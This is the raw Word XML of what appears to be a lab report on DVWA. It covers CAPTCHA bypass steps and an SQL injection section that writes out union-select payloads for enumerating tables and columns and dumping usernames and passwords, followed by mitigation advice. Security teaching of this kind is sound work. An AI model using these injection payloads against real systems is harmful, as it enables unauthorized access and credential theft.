        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="009A7A13">
        <w:t>Change_Parameter_2_Forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C86B9" w14:textId="44C46E81" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53B47A5D" wp14:editId="3C56ACFE">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7266619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945" w14:textId="4D3B141D" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="009A7A13">
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B7731" w14:textId="173AB9BC" w:rsidR="009A7A13" w:rsidRPr="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="699A84E7" wp14:editId="03BE7337">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3891505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733D" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc198745920"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="402E51B2" w14:textId="0B0401B0" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="009A7A13">
        <w:t>Intercept_Req_Captcha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C3173" w14:textId="26378BFA" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="344421FF" wp14:editId="11A861D9">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15486565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B50D" w14:textId="2D215754" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="009A7A13">
        <w:t>Change_Add_parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466716D" w14:textId="53A2E4B4" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DD5CD87" wp14:editId="43684192">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20489221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8967" w14:textId="52E8CA95" w:rsidR="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="009A7A13">
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A94683" w14:textId="5EADA223" w:rsidR="009A7A13" w:rsidRPr="009A7A13" w:rsidRDefault="009A7A13" w:rsidP="009A7A13">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E1CCAC" wp14:editId="120776E1">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15671207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DDA6" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc198745921"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="1B1B01B9" w14:textId="38C8F371" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="005E0565">
        <w:t>Intercept_Req.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6CB4B0" w14:textId="1BB36182" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25C394E5" wp14:editId="4168BE5D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10877751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3142" w14:textId="5C1ED6C0" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="005E0565">
        <w:t>Change_Add_Parameter</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B63FD" w14:textId="5C38F5B8" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255D5C76" wp14:editId="12617F99">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19730424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3C92" w14:textId="7016EC3F" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898632C" w14:textId="0D9ADB8E" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E73CEA0" wp14:editId="11234D84">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14906186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181F" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRPr="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc198745922"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="745FF7B4" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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 xml:space="preserve"> 1. Session-Bound CAPTCHA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AEA755" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Link CAPTCHA to session ID or user IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675633EE" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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 xml:space="preserve"> 2. Time-Limited Expiry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7113194F" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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CAPTCHA should expire after a short time or after one use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BEE277" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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 xml:space="preserve"> 3. Server-Side Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A029EF6" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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CAPTCHA must be validated server-side, not just by comparing static values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419911E4" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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 xml:space="preserve"> 4. Use Modern CAPTCHA (reCAPTCHA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28503F75" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Use Google reCAPTCHA v2/v3 or hCaptcha with behavioral detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F2700" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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 xml:space="preserve"> 5. Add Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7E704" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Block brute-force attempts per IP, user, or session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488BC2C0" w14:textId="50886216" w:rsidR="00C3478B" w:rsidRPr="005E0565" w:rsidRDefault="00C3478B" w:rsidP="005E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7D8C9" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A0C3E8" w14:textId="5BDDF7AE" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc198745923"/>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="30D81076" w14:textId="32F7290E" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc198745924"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="7B5BA3FB" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:p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 xml:space="preserve">While testing the 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>SQL Injection (SQLi)</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0565">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module in DVWA, I discovered that the web application is vulnerable to user input being directly embedded in SQL queries without proper sanitization. This allowed me, as an attacker, to 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>inject malicious SQL code</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0565">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the application to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AEBB37" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Extract database information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B50D72B" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Bypass authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075B4A37" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Potentially gain access to the underlying system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB37E38" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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C4B84" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc198745925"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="01ED498C" w14:textId="795C55F6" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005E0565">
        <w:t>1' order by 2#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F23F9E" w14:textId="4BB1049D" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483FE420" wp14:editId="1D7DA0C5">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20827240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E01A" w14:textId="296898A1" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005E0565">
        <w:t>1' union select user(),database()#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A383B5" w14:textId="60C5301D" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43139C6A" wp14:editId="685B9C07">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10652997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2555" w14:textId="6023DC2E" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005E0565">
        <w:t>0' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E51318" w14:textId="4A82C177" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7C7ECB" wp14:editId="6B599FFD">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="12168706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BD39" w14:textId="595D7E86" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005E0565">
        <w:t>0' union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A1562E" w14:textId="435B6CB5" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00918750" wp14:editId="72275E4D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20875400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01CB" w14:textId="75C8EF9D" w:rsidR="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005E0565">
        <w:t>0' union select user,password from dvwa.users limit 0,1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF6AB5" w14:textId="1988EAED" w:rsidR="00E134FF" w:rsidRPr="005E0565" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:ind w:left="66"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57151A2A" wp14:editId="6CA0DC11">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14516955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0030" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc198745926"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="1C6A4D59" w14:textId="2C476879" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00E134FF">
        <w:t>Capture_req_add_parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0945AD28" w14:textId="18F10239" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74281B17" wp14:editId="1B46225C">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="231927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D74B" w14:textId="5ABD6B03" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B936427" w14:textId="5EAA0D22" w:rsidR="00E134FF" w:rsidRDefault="00CB3DB0" w:rsidP="00E134FF">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68A993C8" wp14:editId="57E79D15">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20739222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8E41" w14:textId="01B9C1E9" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00E134FF">
        <w:t>Capture_Req_Add_Paramete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0516607B" w14:textId="42E03651" w:rsidR="00CB3DB0" w:rsidRDefault="00CB3DB0" w:rsidP="00CB3DB0">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66E55FFB" wp14:editId="79AF5F4A">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17226561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EBB0" w14:textId="50CE899A" w:rsidR="00E134FF" w:rsidRDefault="00E134FF" w:rsidP="00E134FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63F7E3" w14:textId="29AAE55F" w:rsidR="00CB3DB0" w:rsidRPr="00E134FF" w:rsidRDefault="00CB3DB0" w:rsidP="00CB3DB0">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B449E39" wp14:editId="76C8353D">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15894540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0761" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc198745927"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="1936CAAE" w14:textId="736E1110" w:rsidR="00CB3DB0" w:rsidRDefault="00CB3DB0" w:rsidP="00CB3DB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB3DB0">
        <w:t>Insert_Payload_&amp;_Get_Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6DB63B" w14:textId="73F4C12A" w:rsidR="00CB3DB0" w:rsidRPr="00CB3DB0" w:rsidRDefault="00CB3DB0" w:rsidP="00CB3DB0">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="461E5EA1" wp14:editId="1B53BEB7">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16765979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FB30" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc198745928"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="0E7DA863" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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 xml:space="preserve"> Use Prepared Statements (Parameterized Queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B1A946" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:p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Example in PHP (using PDO):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB7849A" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:p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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A66B4D4" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:p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CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133FB49" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:p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$stmt = $pdo-&gt;prepare("SELECT * FROM users WHERE id = ?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723C0A4A" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565">
      <w:p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$stmt-&gt;execute([$_GET['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463B2F2" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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 xml:space="preserve"> Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD49D57" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Validate and whitelist numeric parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA511FC" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Reject or sanitize special characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AFC24B" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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 xml:space="preserve"> Limit Database Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD979A" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E056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Application users should not have access to DROP, DELETE, or INSERT unless needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626DDF69" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E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56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E0565">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20B1B6" w14:textId="77777777" w:rsidR="005E0565" w:rsidRPr="005E0565" w:rsidRDefault="005E0565" w:rsidP="005E0565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565">
        <w:rPr>
